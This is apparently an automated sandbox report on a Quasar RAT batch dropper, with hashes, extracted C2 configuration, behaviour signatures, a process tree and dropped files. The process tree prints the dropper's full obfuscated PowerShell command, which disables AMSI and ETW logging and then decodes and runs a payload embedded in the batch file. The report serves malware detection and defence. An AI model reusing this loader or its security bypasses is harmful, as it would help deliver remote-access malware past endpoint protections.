Analysis

  • max time kernel
    111s
  • max time network
    122s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    25-11-2024 23:23

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    8eecabd958ac81525f071d8f8f9c5b4f

  • SHA1

    293f0625c5eafc5193d582244603d5981c5c6ef5

  • SHA256

    8c0ed0a2488582fa19983c458e298b76bad3f81402da794f55d4b5adbf101db3

  • SHA512

    3ecc3d4a22fd945777eea8ca732c3009ca65bc0e44ea388e0602db500da2f20ef2d465ef107a79595ea3f5c89eccbf634fcbb7fb46197a8513a6317450b80704

  • SSDEEP

    49152:B78bwAn48Himx5yYfP0z1TjhIkgbN+7fSnndvcW:a

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';${kdoTkq`Gent`Obgn}=([SyStEm.TexT.eNcODING]::uTF8.GETstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SYStEm.TeXT.ENCoDING]::UTf8.geTstrINg((65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 65, 109, 115, 105, 85)) + [SyStem.teXT.ENcoDIng]::uTF8.geTSTRinG([SYsTEM.cOnvErT]::FRoMbase64StRing('dGlscw==')));${kdOtmftjtoczLt}=([SySTEM.TEXT.encoDing]::UTF8.gEtsTrING([SyStEm.ConVerT]::frOMBASe64stRing('YW1zaUluaXRGYWlsZWQ=')));$kdOtrBXZtJMXwe=[REF].aSSEmBly;${k`D`OtinuLtqZ`Mj`I}=$kdotrBXztjMxwe.GettyPE(${k`D`OtkqgeNto`B`Gn});${KDotvlLHOtMVOT}=${kDO`Tinultqz`MJI}.GEtfiEld(${k`Dotmf`TJtOCZLt},([syStEm.Text.ENcoDiNG]::Utf8.getStrING([SyStEm.CONVeRt]::fRomBase64STriNG('Tm9uUHVibGljLFN0YXRpYw=='))));${kdotv`Ll`H`Otm`Vot}.SETVAluE($nULL,(([MaTh]::roUnd([maTH]::Pi) -eq (4583 - 4580))));([REFLEcTIon.aSSembly]::LOaDwITHpaRtIAlnAMe(((([systeM.tEXT.EnCoDinG]::UTf8.gEtSTRING((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).geTtyPe(((([sYStEm.TeXT.encodING]::utf8.GETsTRINg((0x53, 0x79, 0x73, 116, 101, 109, 46, 68, 105, 0x61, 103, 110, 111, 115, 0x74, 0x69, 99, 115, 0x2e, 0x45)) + [SystEM.TEXt.EncOdInG]::UTF8.GEtstRINg([sysTEM.coNVert]::frOMbAse64stRInG('dmVudGluZy5FdmVudFByb3ZpZGVy')))))).gEtFIELD(((([sYStem.teXt.EnCodIng]::uTf8.gETsTRING((0x6d, 0x5f, 101, 110)) + [sYstEm.Text.ENcodInG]::UTf8.getsTRinG([sYSTeM.cONVERT]::FromBase64STring('YWJsZQ==')) + [system.text.EnCOdiNG]::utF8.GETStRinG((100))))),((([sySTEM.tExT.eNcodInG]::Utf8.GeTstrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x49, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x63, 0x65)))))).seTvALue([ref].AssEMBlY.gETtyPE(((([sysTem.tEXT.ENCOdiNg]::utF8.gETString((0x53, 121, 115, 0x74, 0x65, 109, 0x2e, 77, 97, 110, 0x61, 0x67, 0x65, 0x6d, 0x65, 110, 0x74, 46, 65, 0x75, 0x74, 0x6f, 0x6d, 0x61, 0x74, 105, 0x6f)) + 
[SyStEm.TEXT.eNcoding]::UtF8.getStRING((0x6e, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x69, 0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).getfIEld(((([SYsTeM.tEXt.EncodIng]::utF8.getStriNg((0x65, 116, 0x77, 80, 0x72, 111, 118, 0x69, 0x64, 0x65, 0x72))))),((([syStem.TexT.enCodING]::uTf8.GETstrING([SystEM.CoNveRT]::FromBAse64StrIng('Tm9uUHVibGljLFN0YXRpYw==')))))).GEtVALUe($nUll),0));.([char](((-1880 -Band 3977) + (-1880 -Bor 3977) - 4958 + 2966))+[char](((-5904 -Band 9157) + (-5904 -Bor 9157) + 6302 - 9454))+[char](((-21634 -Band 6735) + (-21634 -Bor 6735) + 8883 + 6136))) ([teXt.EncOdiNG]::utf8.GeTsTRING([COnvERt]::FROmbaSE64striNg((.([char]((10951 - 6660 - 8049 + 3829))+[char]((14226 - 7595 - 9122 + 2592))+[char]((24730 - 8863 - 9864 - 5887))+[char](((-5132 -Band 1756) + (-5132 -Bor 1756) + 8940 - 5519))+[char](((1940 -Band 2956) + (1940 -Bor 2956) - 6449 + 1620))+[char](((-6729 -Band 3763) + (-6729 -Bor 3763) - 545 + 3622))+[char]((-4095 - 1385 + 928 + 4662))+[char]((-6662 - 1701 + 5421 + 3058))+[char](((-2558 -Band 9162) + (-2558 -Bor 9162) - 7234 + 731))+[char](((2844 -Band 3096) + (2844 -Bor 3096) - 1177 - 4653))+[char](((-16140 -Band 2909) + (-16140 -Bor 2909) + 8371 + 4976))) $kDot_file -raw | .([char]((6554 - 7231 + 5942 - 5182))+[char](((3079 -Band 9477) + (3079 -Bor 9477) - 9412 - 3043))+[char](((-4179 -Band 8133) + (-4179 -Bor 8133) - 5058 + 1212))+[char]((19429 - 6371 - 4893 - 8064))+[char](((-8637 -Band 6960) + (-8637 -Bor 6960) + 3708 - 1932))+[char]((-9407 - 2390 + 4965 + 6948))+[char]((3773 - 784 + 6348 - 9292))+[char](((-17685 -Band 7650) + (-17685 -Bor 7650) + 6965 + 3153))+[char]((-1848 - 3742 + 3489 + 2217))+[char](((-15472 -Band 7425) + (-15472 -Bor 7425) - 1465 + 9626))+[char]((1512 - 5248 + 8485 - 4644))+[char](((-10605 -Band 4896) + (-10605 -Bor 4896) + 4426 + 1393))+[char](((3437 -Band 468) + (3437 -Bor 468) + 5827 - 9629))) (([sYSTEm.teXT.eNCODiNG]::utf8.gEtstRing(58)) + 
([sySteM.TeXT.ENcodiNg]::uTF8.gETstriNG([sYSTem.convERt]::fRomBasE64StRing('OktET1Q6OiguKik='))))).MaTcheS.GrOUPS[1].vAluE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B07.tmp" "c:\Users\Admin\AppData\Local\Temp\tqncah4t\CSCCEDBE81813A4530AE21B880AD24D011.TMP"
          4⤵
            PID:4516

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES9B07.tmp

      Filesize

      1KB

      MD5

      f971046ee94887ec780df23a613aa682

      SHA1

      a6a6f7f8c023795297118716ed8b280efd40a632

      SHA256

      ae34ae8f39370b8226724f6eda9a620a68a7cf756e914afce141d24bec749567

      SHA512

      a218b39db2cea8ab2a5ca7d8b2980f876dda8bbec9157db9076c89dbb8f85b04859bcb87a9905b7191562623168b2fcac3f65bb08a8dc9c34daf51c875e3b0ae

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qasxmxx3.bnh.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.dll

      Filesize

      8KB

      MD5

      1599b844ec9fa4d9333aa34292be122b

      SHA1

      d257e35c64cbb7fcd4fb4de7c18b1c2333adcc7d

      SHA256

      f95e1b765fddea3bbdc184cddaf5434b81b4662e65856e0ee87401f5703ea999

      SHA512

      edb93215f31b9b72db33f06bf4b8d580b439996981169c6ab911f53763806ff8e72af049f93c5c7ff5226ab7d86d19d4fdd0b9e97650ff3bac7c8636e3cef011

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\CSCCEDBE81813A4530AE21B880AD24D011.TMP

      Filesize

      652B

      MD5

      049d86b78f1c4c4d5a7b86b5447d6d43

      SHA1

      8c9b2663d670ecbd661f83832c08947110f6ff7a

      SHA256

      6207b78c5a09cc5a2f50fc71879551b87f2e51c52b51de6c95608c07520715c5

      SHA512

      6383133a57ec2148564f17ad6618449619dee2becbb0e977f2eef804e887524fdb1afbfa035f2cae6f9e66900b06f21209c89b99c37090e678028838c60e0f8c

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.0.cs

      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.cmdline

      Filesize

      369B

      MD5

      aab34c3dbfe361d74ca08bf7732d55a9

      SHA1

      bcdc643e3cf2023b5c93f54912c1071a3a656cff

      SHA256

      066b123bd05f24e857d31c37d3227dad698ab57ac3e3ffc9e88bcf530e9e851d

      SHA512

      182b2bc596a85db2daa81353e229daa597439f27947541e1d6c3240717554e13e61d757c05022ceb7d81c5cb81ba35f4baa9c23308fe55a688a05cbc8350c140
